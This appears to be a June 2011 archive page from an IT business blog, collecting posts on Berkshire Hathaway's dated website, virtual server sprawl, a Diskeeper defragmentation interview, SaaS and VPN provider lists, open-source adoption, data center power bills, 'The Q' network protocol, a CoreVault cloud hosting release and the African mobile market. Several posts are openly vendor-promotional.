Archives for : June2011

An Open Letter To Warren Buffett: Please Fix Your Ugly Web Site

Berkshire Hathaway is one of the most successful companies in the world. As of this article’s publication, its stock is currently trading at $115,540.00 per share. That’s enough to buy 60 houses in Michigan.

It’s no wonder that the company’s CEO – Warren Buffett is – has been listed as the 3rd richest man in the world. (Just slightly ahead of me)

So you’d think that an organization like this would have the resources to put up a killer web site, or at least spend $30 on a nice template. Unfortunately, BerkshireHathaway.com looks more like an old Geocities homepage site than a corporate online presence.

So I recently asked a number of Enterprise Features readers to give their input into what design changes they’d recommend for the Berkshire Hathaway web site. Here’s what they had to say.

Dotty from Premium Web Sites

This website needs an initial design!  I would find out the target market (not very clear on the site) and come up with a pleasing design for that market.  Also the site needs more information – not just links.  Who is this site speaking too?  Lets get it optimized for whoever that is with better and more content.  Get some social interaction and possibly user generated content to liven up the site.

Dylan Valade fromPine Lake Design

Here is my idea for what the BH homepage should look like.

Philip Morgan From Positive Revolution

Berkshire Hathaway needs a Positivity Section. This is where they can categorize their companies’ positive attributes such as social giving, fund raising and all the positive initiatives that take place within their organizations.

Samuel Hartman From The Nail That Sticks Up

Here’s what I’d do:

  • Update DNS servers so that berkshirehathaway.com works without the “www.” (currently it does not)
  • Fold existing site data into a content management system such as WordPress or Joomla
  • Remove archaic language such as “about our WEB page”
  • In general promote the site to be as larger-than-life as Warren himself is. Its current layout reflects the style of webpages from the 90s.

Although this article takes some playful jabs, I want to make it clear that I personally have the upmost respect for Mr. Buffett, and I hope he takes this in good humor as it was intended.

Most Common Problems Associated with Virtual Server Sprawl

Installing a new physical server is a long process.  First, you have to make decisions regarding which equipment you’re going to buy and which vendors will be supplying.  Then, you need to allow time for shipping and order processing.  Then, you need to go through the whole process of allocating rack space, setting up the network wiring, and connecting the power.  If this whole process could easily take three or four weeks.

With virtualized systems, all you have to do is click a button.

For this reason, it can be very tempting for IT and administrators to install all sorts of new systems… whether they need them are not.  This type of “virtual server sprawl” is different from physical server sprawl in many ways, but the challenges are just as serious.

With physical server sprawl, you have to worry about things such as power consumption, datacenters real estate, maintenance and upgrades, etc…  But with virtualized server sprawl, you now have to worry about orphaned systems eating up precious system resources, wasting expensive software licenses, and the additional administrative & management headaches that are caused for the IT department.

One of the issues that makes virtual server sprawl extra challenging, is that it’s easier to add a new server they need than it is to take it away.  It’s a bit like being stuck in quicksand.  Every time you reach down to pull a leg out, you sink further in.

Once you’ve allocated resources to a server that wasn’t needed, it can be very difficult to get those resources back.  This is especially true in environments that have many (100 or more) virtualized servers in use.

  • When killing off a server that you believed to be orphaned, how can you be absolutely sure that you’re not accidentally taking an essential service offline?
  • How much is this virtual server sprawl costing you in terms of licensing and resources?
  • How can you identify an under-used server in such a way that it can be isolated?  And how do you measure its utilization to ensure that it is, in fact, being under-utilized?
  • Because of the complications involved, removing an unnecessary virtual server might require significant IT time.  Many orphaned servers are benign and cost very little to operate. How do you measure the wastefulness of an under-used server so that the cost of removing it doesn’t end up being higher than the cost of simply leaving it in place?

The way I see it, the problem of virtual server sprawl is not something that can simply be solved by spending more on hardware.  Because of the exponential growth curve associated with these types of problems, the best solution is to take a high level, strategic approach.

You need to start from the very beginning, and build your IT strategy on a sound foundation that takes these problems into consideration.  Being smarter and more objective about the criteria required to justify the new virtual server implementation will help eliminate many of these more expensive problems down the road.

The Biggest Disk Defragmentation Myths

Founded in 1981, Diskeeper Corporation is the technology innovator in performance and reliability technologies. The company’s products make computer systems faster, more reliable, longer lived and energy efficient, all with zero overhead.

Inventors of the first automatic defragmentation in 1986, Diskeeper pioneered a new breakthrough technology in 2009 that actually prevents fragmentation.

Diskeeper’s family of products are relied upon by more than 90% of Fortune 500 companies and more than 67% of The Forbes Global 100, as well as thousands of enterprises, government agencies, independent software vendors (ISVs), original equipment manufacturers (OEMs) and home offices worldwide.

Today, I’ll be interviewing Colleen Toumayan from Diskeeper.

What is disk defragmentation, and why is it important?

The weakest link in computer performance is the hard disk. It is at least 100,000 times slower than RAM and over 2 million times slower than the CPU. In terms of computer performance, the hard disk is the primary bottleneck. File fragmentation directly affects the access and write speed of that hard disk, steadily corrupting computer performance to unviable levels. Because all computers suffer from fragmentation, this is a critical issue to resolve.

What is fragmentation?

Fragmentation, by definition, means “the state of being fragmented,” or “something is broken into parts that are detached, isolated or incomplete.” Fragmentation is essentially little bits of data or information that are spread over a large disk area causing your hard drive to work harder and slower than it has to just to read a single file, thus affecting overall computer performance.

Imagine if you had a piece of paper and you tore it up into a 100 small pieces and threw it up in the air like confetti. Now imagine having to collect each of those pieces and put them back together again just to read the document. That is fragmentation.

Disk fragmentation is a natural occurrence and is constantly accumulating each and every time you use your computer. In fact, the more you use your PC, the more it builds-up fragmentation and over time your PC is liable to experience random crashes, freeze-ups and eventually the inability to boot up at all. Sound familiar? And you thought you needed a new PC.  Imagine if you had a piece of paper and you tore it up into a 100 small pieces and threw it up in the air like confetti.

That is fragmentation and it is what happens to the data on your hard drive every time you save a file. The question is simple. Why defrag your hard drive after the fact, when you can prevent the majority of fragmentation in the first place.

By intelligently writing files to the disk without fragmentation, your hard drive read/write heads can then read a file that is all lined up side by side in one location, rather than jumping to multiple spots just to access a single file.

Just like shopping, if you have to go to multiple stores to get what you want, it simply takes longer. By curing and preventing the fragmentation up front, and then instantly defragging the rest, you experience a whole new level of computer performance, speed and efficiency.

Fragmentation can take two forms: file fragmentation and free space fragmentation.

“File fragmentation causes performance problems when reading files, while free space fragmentation causes performance problems when creating and extending files.” In addition, fragmentation also opens the door to a host of reliability issues. Having just a few key files fragmented can lead to an unstable system and errors.

Problems caused by fragmentation include:

System Reliability:

  • Crashes and system hangs
  • File corruption and data loss
  • Boot up failures
  • Aborted backup due to lengthy backup times
  • Errors in and conflict between applications
  • Hard drive failures
  • Compromised data security

Performance:

  • System slows and performance degradations
  • Slow boot up times
  • Increase in the time for each I/O operation or generation of unnecessary I/O activity
  • Inefficient disk caching
  • Slowdown in read and write for files
  • High level of disk thrashing (the constant writing and rewriting of small amounts of data)
  • Slow backup times
  • Long virus scan times
  • Unnecessary I/O activity on SQL servers or slow SQL queries

Longevity, Power Usage, Virtualization and SSD:

  • Accelerated wear of hard drive components
  • Wasted energy costs
  • Slower system performance and increased I/O overhead due to disk fragmentation compounded by server virtualization
  • Write performance degradations on SSDs due to free space fragmentation

Why do operating systems need to break files up and spread their contents across so many places? Why doesn’t it just optimize when writing the file?

Files are stored on a disk in smaller logical containers, called clusters. Because files can radically vary in size, a great deal of space on a disk would be wasted with larger clusters (a small file stored in a large cluster would be only consuming a % of the available cluster space). Thus clusters are generally (and by default) fairly small. As a result, a single medium-sized or large file can be stored in hundreds (or even up to tens of thousands) of clusters.

The logic which fuels the native Windows Operating System’s file placement is hardly ideal. While it has made some advances in recent years, a Windows user at any level of engagement (home notebook all the way up to enterprise workstation) is faced with an ever-increasing level of file fragmentation.

This is largely attributable to a lack of consolidated free space as well as pre-existing fragmentation (essentially: fragmentation begets fragmentation). The OS will try to place a file as conveniently as possible.

If a 300MB file is being written, and the largest available contiguous free space is 150MB, 150MB of that file (or close to it) will be written there. This process is then repeated with the remainder… 150MB of file left to write, 75MB free space extent, write… 75MB of file left to write, 10MB free space extent, write… and so on, until the file is fully written to the disk. The OS is fine with this arrangement, because it has an index which maps out where every portion of the file is located… but the speed at which the file could optimally be read is now vastly degraded.

As an extra consideration, that write process is exponentially longer than if there had simply been 300MB of free space available to drop the file into, all connected.

If Windows already has a free disk defragmentation utility, why should I pay money for another one?

  1. Incomplete. Can’t get the job done.
  2. Won’t defrag free space.
  3. Resource intensive. Can‘t be run when the system is active.
  4. Servers? It can’t keep up with them.
  5. Hangs up on big disks. You never know what the progress is.
  6. Eats up IT admin time administering.
  7. Takes forever. May never finish.
  8. Effects of fragmentation still not eliminated!

Inefficient defragmentation means higher help desk traffic, more energy consumption, shorter hardware life, less time to achieve proactive IT goals, and throughput bottlenecks on key consolidation economies such as virtualization.

What are some of the biggest misconceptions that people have when it comes to disk defragmentation?

Myth #1: The built-in defragmenter that comes with Windows® is good enough for most situations because it can be scheduled.

After the fact defrag solutions, including the built-in, allow precious resources to be wasted by writing fragmented files to the disk. Once a file is written, the defrag engine has to go to work to locate and reposition that file. When that file later expands, this doubling effort has to repeat itself all over again — this approach remains a reactive band-aid to a never-ending problem. Not even the built-in defrag can keep pace with the constant growth of fragmentation between scheduled defrags. Manual defrags tie up system resources, so users just have to wait … and wait … and wait.

When you are only doing scheduled defrags (or nothing at all), your PC accumulates more and more fragmentation, which leads to PC slows, lags and crashes. This problem cannot be handled with a freebie utility even if it can be “scheduled”. Here’s why:

Systems accumulate fragmentation continually. When the computer is busiest (relied upon the most), the rate of fragmentation is highest. Most people don’t realize how much performance is lost to fragmentation and how fast it can occur. To maintain efficiency at all times, fragmentation must be eliminated instantly as it happens or proactively prevented before it is even able to happen. Only through fragmentation prevention or instant defrag can this be accomplished.

Scheduling requires planning. It’s a nuisance to schedule defrag on one computer, but on multiple PCs it can be a real drain of time and resources. Plus, if your PC isn’t on when the defrag process is scheduled; it will not run until you turn your PC on again. By then, you will need to use your computer and you will experience PC performance slows while you work – that is, if you are able to work at all.

Scheduled defrag times are often not long enough to get the job done.

Myth #2: Active defragmentation is a resource hog and must be scheduled off production times.

This was very true with regard to manual defragmenters. They had to run at high priority or risk getting continually bounced off the job. In fact, these defragmenters often got very little done unless allowed to take over the computer. When the built-in defragmenter became schedulable, not much changed. The defrag algorithm was slow and resource heavy. Built-in defragmenters were really designed for emergency defragmentation, not as a standard performance tool.

Ever since first released in 1994, Diskeeper® performance software has been a “Set It and Forget It”®, schedulable defragmenter that backed off system resources needed by computer operations. Times have changed and a typical computer’s I/Os per second (IOPS) has accelerated a hundred fold.

Because this drove the rate of fragmentation accumulation way up, Diskeeper Corporation saw the need for a true real-time defragmenter and developed a new technology, InvisiTasking® technology. This innovative breakthrough separates usable system resources into five areas capable of being accessed separately.

As a result, robust, fast defrag can occur even during peak workload times – and even on the busiest and largest mission-critical servers. In the latest version, Diskeeper incorporated a new feature called IntelliWrite® fragmentation prevention technology. This new feature prevents file system fragmentation from ever occurring in the first place.

By preventing up to 85% of fragmentation, rather than eliminating it after the fact, Diskeeper is able to improve system performance much more dynamically and beyond what can be done with just the automatic defragmentation approach.

Myth #3: Fragmentation is not a problem unless more than 20% of the files on the disk are fragmented.

The files most likely to be fragmented are precisely the ones relied upon the most. In reality, these frequently accessed files are likely fragmented into hundreds or even thousands of pieces. And they got that way very quickly. This degree of fragmentation can cost you 90% or more of your computer’s performance when accessing the files you use most. Ever wonder why some Word docs take forever to load? Without fragmentation, they load in a flash. Files load times are quicker and backups, boot-ups and anti-virus scans are significantly faster.

Myth #4: You can wear out your hard drive if you defragment too often.

Exactly the opposite is true. When you eliminate fragmentation you greatly reduce the number of disk accesses needed to bring up a file or write to it. Even with the I/O required to defragment a file, the total I/O is much less than working with a fragmented file.

For example, if you have a file that is fragmented into 50 pieces and you access it twice a day for a week, that’s a total of 700 disk accesses (50 X 2 X 7). Defragmenting the file may cost 100 disk accesses (50 reads + 50 writes), but thereafter only one disk access will be required to use the file. That’s 14 disk accesses over the course of a week (2 X 7), plus 100 for the defrag process = 114 total. 700 accesses for the fragmented file versus 114 for the defragged file is quite a difference. But in a real world scenario, this difference would be multiplied hundreds of times for a true picture of performance gain.

With the release of Diskeeper 2011, we are tracking how many I/O’s Diskeeper helps save your system, making it even easier to gauge the benefits of running Diskeeper on your computer.

In addition to proactively curing and preventing fragmentation, Diskeeper 2011 also now defaults to an optimized defragmentation method (for the fragments that were not prevented) to maximize efficiency and performance while minimizing disk I/O by prioritizing which files, folders and free space should be defragmented. This setting can be changed to a more thorough defragmentation option from the Defragmentation Options tab in the Configuration Properties for those who wish to do so.

How has disk defragmentation changed over recent years? What trends are going to change it in the future?

With new storage technologies such as SAN and Virtualization, defragmentation has changed to address their specific peculiarities.  We have specific product for Virtualization V-locity that goes well beyong defrag and we also have a SAN edition of Diskeeper 2011.  Cloud will bring new technologies  I am sure as well.

What should people look for when shopping around for disk defragmentation programs?

They will want one that prevents fragmentation before it even happens, one that has technology to instantly handle any fragmentation that cannot be prevented, one that is efficient and able to really target that fragmentation that is impeding system performance, one that has zero system resource conflict, one that is specially designed with new storage technologies in mind.

Top 10 SaaS Software Providers In Every Category For July 2011

Top 10 SaaS Customer Relationship Management (CRM)

  1. Commence CRM
  2. NetSuite
  3. CLP Suite
  4. Appshore
  5. SageCRM.com
  6. Infusion Software
  7. Microsoft Dynamics
  8. eGain
  9. Salesboom
  10. SofFront

Top 10 Hosted Exchange Providers

  1. NetNation
  2. Hostirian
  3. Apptix
  4. Exchange My Mail
  5. Kerio Mail Hosting
  6. Apps4Rent
  7. MyOfficePlace
  8. SherWeb
  9. Evacloud
  10. FuseMail

Top 10 SaaS Invoicing Software Services

  1. BillingBoss
  2. CashBoard
  3. LessAccounting
  4. Intuit Billing Manager
  5. CurdBee
  6. SimplyBill
  7. FreshBooks
  8. BlinkSale
  9. Bamboo Invoice
  10. Zoho Invoicing

Top 10 Managed Web Hosting and Dedicated Servers

  1. Rackspace
  2. AYKsolutions
  3. Hostgator
  4. aplus.net
  5. KnownHost
  6. The Planet
  7. FIREHOST
  8. ServInt
  9. MegaNetServe
  10. Limestone Networks

Top 10 Online Backup Services For Servers

  1. Zetta
  2. CoreVault
  3. Zmanda
  4. Backup-Technology
  5. Novosoft Remote Backup
  6. CrashPlan
  7. LiveVault
  8. SecurStore
  9. DSCorp.net
  10. AmeriVault

Top 10 Web Analytics Services

  1. WordStream
  2. Extron
  3. Woopra
  4. At Internet
  5. Logaholic
  6. MetaSun
  7. AdvancedWebStats
  8. GetClicky
  9. Piwik
  10. OneStat

Top 10 Virtual Private Network Providers (VPN)

  1. Cyberghost VPN
  2. Always VPN
  3. Black Logic
  4. Pure VPN
  5. DataPoint
  6. Golden Frog
  7. Strong VPN
  8. Anonymizer
  9. VPN Tunnel
  10. Personal VPN

Top 10 SaaS Accounting and Bookkeeping Software Providers

  1. Netsuite
  2. NolaPro
  3. Xero
  4. Clear Books
  5. Accounts Portal
  6. Yendo
  7. Merchant’s Mirror
  8. Envision Accounting
  9. Skyclerk
  10. Wave Accounting

Top 10 SaaS Online Payroll Software Providers

  1. Evetan
  2. Simple Payroll
  3. Paycor
  4. WebPayroll
  5. Triton HR
  6. Amcheck
  7. Patriot Software
  8. Perfect Software
  9. Compupay
  10. Paylocity

Why Are Companies So Reluctant To Implement Open-Source?

My firm promotes open source and free programs as much as possible.  Why are the platforms that we install for our clients and the programs we recommend controversial?  After all, our systems are extremely stable and very low-cost.  We deliver exactly what is needed without wasted resources.  Our on-site time is extremely low and all of our hosted services are high-security, so why would anyone complain?

After extensive discussions with a lot of people who make a living at providing IT services to small business owners, the common denominator among all of the detractors was (I hate to say it), incompetence and greed.

If a company is going to promote open-source, that company really needs to know their tech, and be fully competent.

Some examples:

Microsoft consultant at a networking meeting:  Him:  “I am so bored.  Oh boy!  I get to restore another server!  Boring!”  Me:  “Why don’t you get into open source?”  Him:  “No money in it.”

IT consultant trying to get us to give him business:  Samba servers don’t work in a corporate environment.  You have to set them up perfectly in order for them to be stable. (Computer tech is binary – yes/no; off/on; works/doesn’t work.  Shades of gray belong to the Humanities fields, not Technical fields.  All servers need to be set up perfectly; there is no “almost right” in computer science).

IT skills are beyond the knowledge-base of most small business owners; they hire IT consultants to provide the necessary skill set.  An unfortunate outcome is that many small business owners are deluded into believing that a crashed server, non-functioning software or slow systems are a normal part of doing business.

A tech must be highly trained to perfectly set up a closed source server and the current business environment often demands that the consultant is licensed in the closed source software.  Unfortunately, the licensing for a Microsoft Certified Systems Engineer (MCSE) is attained by passing a computerized, multiple- choice test.   The answers can be memorized since the questions and answers are available on the Internet.   As we all know, the ability to memorize has nothing to do with the ability to apply.   A closed source program is a program that does not reveal the code used to create the program. This means that whatever flaws exist in the programming are outside of the tech’s ability to handle.

A professional or company promoting the use of open source is a completely different equation.  Techs using open source are almost always self-trained, not only in the software they are installing on the SMB system, but in multiple open source fields.  This is indicative of an intellect that is not only highly-disciplined, but has an active interest in new challenges.   Open source technology is a continuously changing field and the ability to self-train is mandatory.  If the open source technology is not fully understood, the end result will be failure.  The bottom line:  a company promoting open source knows the technology they are using, inside and out.  The code used to create the programs being promoted and used are available to the tech, which gives more facility for customization and advanced implementation.

Software bugs in a closed source program are the sole responsibility of the company selling the software.  Whether or not/when those bugs will be fixed depends solely on the interest of the software company who owns the code and the time and abilities of the programmers working for the software owners.

Bugs in an open source program are addressed by a huge open source field consisting of individuals dedicated to an open exchange of code, fixes and ideas.  Whereas a closed source system can only be repaired by the limited number of techs working for that system, open source bugs are continuously being addressed by thousands of programmers from all over the world.

Cost:

Microsoft’s model is based on “closed source”:  The consumer buys a product or the product is included as part of the software loaded into a new computer.  To make that product fully functional, the consumer must buy more products with large licensing costs.   In order to make the product friendly to users, extra setup steps are added in for techs servicing the system, which boils down to more time spent working on setup.  If a small business owner is paying a consultant by the hour, the rates go up.  Even if the system is set up perfectly, expenses pile onto expenses.

Open source is not free financially, but does not have as many  licensing fees for the software itself.  Fees paid for open source are usually for customization, support, hosting and maintenance.   The majority of open source programs for sale on the market offer two versions; with or without support.  In either case, the code used to build the program is accessible.

There are needs for both in the industry.  Microsoft’s active directory is a very good system for managing authentication and security and can work well in a Linux environment.  Conversely, most open source programs run well on most Microsoft operating systems.

Some open source applications are not controversial.  The Apache Software Foundation provides the open source web server software that is used on the majority of web servers.  Microsoft’s ISS (Internet Information Services) web program has a fraction of this market.

Perhaps the best way to view this field is to realize that there is a standard:  Microsoft and all of its various programs.  Opposing that are people who consider that the standard is not good enough and freely donate their time toward the creation of something better, something more stable, something that is driven by a truly enthusiastic group of idealists who are not concerned as much by the dollar value as they are with the joy of creating something totally workable.

Our company’s business model is based on having many clients with stable systems in place, using our subscription services (as opposed to buying their own hardware) and rarely needing our support services.  To that end, we sell blocks of hours.  Many of our clients only need a block of hours once every 6 months.  Others only need us when they expand.  Just as a note:  We have cut our client’s IT bill drastically when taking over their IT services; the result is that many of our clients have more cash flow, allowing them to expand more rapidly.

About The Authors: Cedric Halbach, President, Daniel Lawson, Technical Director, Susan Risdal, Admin Director. Enterprise Technology Services, LLC is a highly-experienced Information Technology firm, serving the needs of small businesses in New Jersey and New York.

Your Help Needed In The Battle for Control over the Internet – #killswitch

I’ve recently become aware of a new film project that could have a profound impact when it comes to raising mainstream awareness when it comes to digital access, censorship, net neutrality and privacy rights. I’m posting this here in hopes that we can attract attention to this project, and get these filmmakers the support they need to get their message out.

Picture a world where everything that you read, see, and hear is controlled by one corporation.  Imagine that this corporation had the power to track everything that you do, censor your favorite websites, throttle your blog, and use propaganda to gain influence over your life.

This nightmare scenario is rapidly becoming a reality.

In the year 2011, the mast majority of television, radio, movie studios, and newspapers are owned by just a handful of corporations.  These same media conglomerates are currently merging to take over our Internet and achieve total control.

This is the story of David v. Goliath.  These media conglomerates have the money, politicians, lobbyists, television stations, and production studios; while we have the people.

Will the integrity of your democratic internet be saved? Or will dissent be choked off, as a few multi-national corporations high-jack our Internet and achieve total control?

Educator and writer Chris Dollar is teaming with filmmakers Ali Akbarzadeh and Jeff Horn of Akorn Entertainment in making #killswitch, the first full length documentary to take an in depth look at the battle for control over the Internet.

Learn how you can become involved in this important documentary film by viewing the five minute trailer:

ATTENTION CEOs: Get Your IT Department Their Own Electric Bill

No, I’m serious.

What would you do if I told you that you were paying as much as $600 per year in energy bills for each server in your datacenter… and that 25% of your servers probably don’t even need to be there?

The current priorities for IT departments… aside from new strategic projects… are security and uptime.

Power consumption is simply not a priority because IT is not responsible for paying the electric bills. Your datacenter could be bleeding money through the power sockets… and you wouldn’t even know it.

This is also great opportunity for IT managers who are feeling the squeeze of IT budget constraints.  Once empowered with this information about corporate IT costs, they can take action to minimize energy consumption so that the cost savings can be applied to other areas of IT.

And there’s really a lot that they can do, including:

  • Power management
  • Server consolidation
  • Install more efficient power supplies
  • Upgrading to energy-efficient hardware
  • Etc…

A watt here and a watt there can make a big difference in IT costs.  And there’s also a multiplier effect when you consider that each watt it saved in power consumption also generally equals about a watt saved in cooling costs. (Your savings double)

But before this can become a priority, you need to establish a sense of urgency.  Contact your utilities company and ask them about splitting the electrical billing in such a way that the power usage of the IT department is billed completely separately from the rest of the company.

This will help put things into perspective… and allow you to set specific, actionable goals that enable your company to save money while also helping the planet.

Top 17 Virtual Private Network Providers and VPN Services

With the sudden recent growth in the adoption of mobile computing and wireless networking, companies need to be extra-aggressive when it comes to securing the online interactions of their employees.

This means there is an increased need to hide their online profiles, and encrypt their data transmissions. All it takes is one nosy hacker in an airport, hotel or coffee shop to land your company in serious trouble.

So make sure that all of your employees are protected online, using a secure Virtual Private Network service. Below, I’ve included a list of the top names in the VPN market.

  1. VPN Authority
    Unrestricted use, low price and access to international content. Everything you could want from a Virtual Private Network.
  2. Small Business VPN
    They don’t just give you access to your data. They give you access to your business.
  3. Hide My Ass
    The great anonymizing service with the funny name. Try their free web proxy, or upgrade to their full-featured VPN.
  4. Cyberghost VPN
    A European VPN service that offers free accounts.
  5. Hotspot VPN
    Hotspot VPN was created as a secure solution to the fear that currently surrounds wireless computing.
  6. Pure VPN
    A secure and fast tunneling service that hides your private interactions and protects you online.
  7. DataPoint
    A VPN service that’s provided from a full-service IT support company.
  8. Golden Frog
    A secure connection that follows you when you travel and helps you minimize the online finger prints you leave behind.
  9. Strong VPN
    A great VPN at a great time, with many years of experience behind them.
  10. Anonymizer
    Twenty percent of online consumers will become the victims of a privacy breach. And Anonymizer wants to put an end to this.
  11. Always VPN
    Their service encrypts your online interactions to prevent eavesdropping, while also helping to bypass nasty filters.
  12. Black Logic
    They offer an unmetered Virtual Private Network service for only one hundred dollars per year.
  13. VPN Tunnel
    An encrypted and secure VPN service that does not store any traffic logs.
  14. Personal VPN
    A VPN service that’s designed around the needs of privacy-minded individuals.
  15. Cartish Technologies
    A small independent VPN provider, serving the state of Texas.
  16. Super VPN
    A super safe, super practical online protection service that serves the Canadian market.
  17. Tulip
    The leading data services provider in serving the Indian enterprise market. Offering many services, including Virtual Private Networks.

The Q: An Open-Source Technology That Promises To Make Routers Obsolete And End The Net Neutrality Debate

“The Q.” is a breakthrough network technology that resolves network bottlenecks by applying broadcasting economies to broadband communications. Like original TV and radio, The Q. enables a theoretically unlimited number of users to share the network with extremely low overhead at all times.

The current broadband situation calls for modems and routers to address the fundamental design flaw in the original broadcast Ethernet. The problem with these network devices however, is that they can use more than 50% of the available bandwidth just to manage the whole system, while not supporting broadcast services once they are in place.  As the number of users on the network increases, performance plummets.  Anyone who has attended a conference with lots of Wi-Fi devices has experienced the backside of the bell curve where connections become very slow.  By replacing the legacy protocol with a high performance medium access control (MAC), and flashing the router chips to convert them into hubs, we give networks an architecture that more closely resembles a cable TV network controlled by DOCSIS modems (set top box) at the edge with passive hubs in the middle of the network.

The Q. uses a family of protocols called Distributed Queue Switch Architecture (DQSA). This bottleneck-eliminating technology provides near-perfect performance and stable Quality of Services (QoS) under all conditions.  DQSA is simply a better way to run almost any kind of network at layer 2, the layer that provides access to physical and wireless mediums. In practical terms, this means that additional users can be added to the network without additional overhead, just as a broadcast television station does not worry that additional televisions are receiving its signal, allowing for one to one, one to many, or one to all communications for the price of a single transmission.

This unique solution can be immediately applied to high data rate Body Area Networks (BAN) in healthcare and the military, as well as supporting advances in multi-antenna mesh networks that will lead to ensemble computing.  Ensembles are like clouds on steroids because the cloud architecture will not only be relegated to the data center, but will extend across the entire network, which will solve a big part of today’s security problem.  Ultimately this provides a painless migration path to future network architectures, including the Internet, where old devices will still work, and where we can reduce the global data center footprint for redundant and mirrored servers, saving approximate 3% of our national electric bill.

Currently, redundant or mirrored servers must be geographically dispersed in different time zones in order to serve requests. Backup and physical vulnerability considerations aside, an upgrade with The Q. in the data center would allow us to do for expensive network hardware what open source Linux did to commoditize the server market.  However, when implemented on our old telephony synchronous plant, we could give data center server clusters the ability to serve the world’s requests from a single location by serving popular content on a channel before it is even requested, with a theoretically unlimited number of channels.

With traditional networks, users compete for the channel with actual payload data – which is like several big parties walking into a busy restaurant at the same time.  Now imagine everyone getting back into their cars to circle around the block only to pull up to valet and try again.  It’s a lot of wasted time and energy. The only time one can experience a collision on The Q. is in the reservation request itself, and this small 4% possibility of contention is always resolved quickly by a reservation system that runs in the background of the payload data, which never slows down.

This is how The Q. combines the best features of private line circuit switching with the economy of shared line packet switching.  In fact, The Q. can sustain 110% network saturation before experiencing any throughput degradation, resulting in greater than 95% throughput efficiency, and wireless throughput at greater than 85%.  Ultimately, this efficiency will enable the new TV White Space carriers to provide unified broadband networks for the price of a regular telephone line, giving the public a high quality media experience for much less than cable or satellite, plus voice and data.

With The Q., traditional carriers will lower capital expenditures too, allowing them to build out access mesh networks that will be more reliable because they will scale to infinite proportions.  Connectivity will be more reliable because of multiple links, and access points will have extended reach because of hopping.  These topologies have never been seen in mass-market applications, but the implication of scalable mesh is that we may result in needing very little or no reliance in carrier infrastructure at all.  This could also create thousands of public broadband utilities which would link together to create a national first responders/emergency response network.  This could also be a major source of revenue for municipalities that would build these networks, by selling broadband to local constituents for the price a regular phone line.  Another implication is that telephony privacy laws could extend to broadband communications once served by a public utility, making these laws important again.

Low-level network engineers and network operators are encouraged to join the open source group EcoNode (Ether2 Community Network Operators & Developers) on Linked In or follow the technology http://vator.tv/company/ether2-1 or on twitter @ether2theQ.

CoreVault Launches New VMware vCloud Powered Hosting Service

Flexible Consolidation of Data Security and Built-in Backup and Data Protection

CoreVault, an industry leader in providing data protection services, today announced the availability of its new VMware vCloud® Powered Hosting service. Through its partnership with VMware, CoreVault has developed its Cloud Hosting service to take advantage of all the cost and efficiency benefits of cloud computing, without sacrificing the control of information security.

Designed to consolidate security processes, increase operational flexibility and deliver built-in backup and data protection for today’s business, Cloud Hosting features full compliance with stringent regulatory requirements including HIPAA, Sarbanes Oxley and PCI and is hosted in CoreVault’s own SAS 70 Type II facility. The new solution is available as an Individual Service for small-and-medium-sized businesses (SMBs) that only need a single virtual machine and as an Enterprise Service for larger-scale companies that require a more powerful package of resource options.

We are pleased to build upon the value of our partnership with VMware to offer one of the most secure, flexible and efficient cloud computing environments available,” said Jim Rutherford, President, CoreVault. “By matching industry leading technology with our years of data protection and disaster recovery expertise, CoreVault has perfected cloud computing so that today’s businesses can remain more agile without worrying about business continuity or security.

The CoreVault Cloud Hosting service offers multiple advantages for companies both large and small, including:

  • High Performance with minimized risk and maximized security.
  • Easy deployment that virtually automates infrastructure virtualization with instant scalability.
  • Built-in backup.
  • Cost savings that benefit the bottom line by reducing capital expenses.
  • Flexibility to access applications and data from anywhere at anytime.

The Cloud Hosting service leverages the latest VMware technology, including VMware vCloud Director, which enables the delivery and consumption of multi-tenant private and public clouds. CoreVault provides backup, recovery and hosting services to customers nationwide. Its services are endorsed by professional associations in the legal, healthcare and financial services industries representing over 500,000 business professionals.

Cloud Hosting services are now available. For more information, please visit:

http://www.corevault.com/hosting_in_cloud_solutions.

Follow CoreVault at http://twitter.com/CoreVault

About CoreVault

CoreVault is a Cloud solutions company that provides backup, recovery and hosting services to businesses in more than 37 states. Your data is securely and automatically stored off-site in our privately owned, SAS 70 Type II certified facilities. It is accessible 24/7 with monitoring and support provided by certified experts. Built on VMware’s industry leading technology, Cloud Hosting services are available on an individual or enterprise-level basis. CoreVault is recommended to more than 500,000 business, legal and healthcare professionals across the country by more than 25 associations. You run your business while we provide elite protection and hosting of your data and reputation. For additional information, go to corevault.com.

VMware and VMware vCloud are registered trademarks and/or trademarks of VMware, Inc. in the United States and/or other jurisdictions. The use of the word “partner” or “partnership” does not imply a legal partnership relationship between VMware or any other company.

Penetrating the African Mobile Market

Smartphones, 3G wireless connectivity and downloading various apps to your cell phone are all the rage in today’s world. These advanced technological devices can be found in the pocket, on the belt or in the purse of men and women residing in growing mobile markets like those in the U.S., China, India, Europe and Africa.

Seeing Africa’s Potential

In early 2001, Connectiva Systems recognized the potential of the African telecom market. We believed it would become a leading mobile marketplace and began to explore opportunities. Our foresight was on target; from 2000 through 2007, Africa’s telecom sector boasted an average annual growth rate of 40 percent while investment grew 33 percent.1

Furthermore, increased affordability of mobile phones combined with higher consumer spending power catalyzed much of the region’s telecom growth. Since 2000 alone, Africa gained 316 million new mobile phone subscribers2 to virtually skip the computer era and enter the age of mobile. From mobile banking to complex data services, operators were addressing the changing needs of their subscribers while at the same time generating new revenue streams.

Finding the Means to Penetration

Understanding this context, we entered the African market through our client Zain and its subsidiaries in the region, as well as in the Middle East. Focusing our energy first on Zambia, Kenya and Nigeria, we have since expanded into more than 25 other MENA (Middle East and North Africa) countries including South Africa, Egypt, Uganda, Morocco, Tunisia and the Democratic Republic of Congo.

We quickly discovered that African telecom companies experienced 20 to 25 percent in revenue leakage and did not have the internal expertise to manage their revenue streams. To bridge this gap, we developed a customized portfolio of managed services for revenue assurance.

Our goal was to sell outcomes and solutions, not just the technology. We focused on creating and structuring solutions for Africa that fulfilled the continent’s unique, local needs, keeping the growing number of mobile phone users in mind.

While working with African countries, Connectiva Systems has learned that:

  1. 50 percent of African families are unbanked and keep their money under a mattress at home. Telecom operators were fast emerging as preferred providers for mobile financial services so Connectiva Systems created solutions that addressed needs around mobile banking analytics.
  2. Africa is not the type of place where you can sell and walk away. It needs local marketing, local relationships and sustained engagement. Connectiva Systems hired local employees with a strong understanding of the cultural nuances in business, instead of flying staff from Europe or India to Africa.
  3. Relative to developed markets, the quality of service (QoS) is still poor and operators require solutions that measure QoS and negative customer experiences. In turn, Connectiva Systems launched solutions that enable operators to understand the end-to-end customer experience, such as number of dropped calls, latency in downloads as well as helping the operator provide consumers with special offers they will want to leverage.
